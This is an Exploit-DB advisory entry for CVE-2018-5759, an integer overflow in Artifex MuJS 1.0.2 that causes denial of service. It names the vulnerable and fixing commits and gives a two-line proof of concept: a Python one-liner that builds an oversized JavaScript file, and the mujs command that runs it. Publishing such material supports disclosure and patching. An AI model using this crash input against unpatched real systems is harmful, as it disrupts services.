Artifex MuJS 1.0.2 - Integer Overflow

EDB-ID: 43904
Author: Andrea Sindoni
Published: 2018-01-28
CVE: CVE-2018-5759
Type: Dos
Platform: Multiple
Vulnerable App: N/A

 # Date: 2018-01-16 
# Exploit Author: Andrea Sindoni - @invictus1306
# Vendor: Artifex (https://www.artifex.com/)
# Software Link: https://github.com/ccxvii/mujs
# Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
# Tested on: Linux
# CVE : CVE-2018-5759

Simple poc:
# python -c "print 'func%d'*80000" > poc.js
# mujs poc.js

Fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1 (
http://git.ghostscript.com/?p=mujs.git;a=commit;h=4d45a96e57fbabf00a7378b337d0ddcace6f38c1
)

Related Posts